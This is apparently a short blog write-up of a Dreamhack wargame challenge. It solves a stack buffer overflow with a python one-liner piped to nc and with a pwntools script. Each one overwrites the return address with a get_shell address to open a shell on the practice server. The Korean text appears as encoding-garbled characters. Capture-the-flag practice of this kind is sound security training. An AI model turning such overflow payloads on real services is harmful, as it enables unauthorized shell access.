songining
article thumbnail

Host: host1.dreamhack.games
Port: 10469/tcp

 

1. python ๊ณต๊ฒฉ ์ฝ”๋“œ ์ด์šฉ 

<bash />
(python -c "print('A'*0x30 + 'B'*0x8 + '\xaa\x06\x40\x00\x00\x00\x00\x00')";cat)| nc host1.dreamhack.games 10469

 

2. pwntools ์ด์šฉ 

<python />
from pwn import * p = remote('host1.dreamhack.games',10469) # ์›๊ฒฉ ์„œ๋ฒ„ ๋Œ€์ƒ์œผ๋กœ ์ต์Šคํ”Œ๋กœ์ž‡ ์ˆ˜ํ–‰ context.arch="amd64" # x86-64 payload = 'A' * 0x30 payload += 'B' * 0x08 payload += '\xaa\x06\x40\x00\x00\x00\x00\x00' # get_shell address p.recvuntil('Input: ') p.sendline(payload) p.interactive()

 

flag ์–ป๋Š” ๋ฐฉ๋ฒ•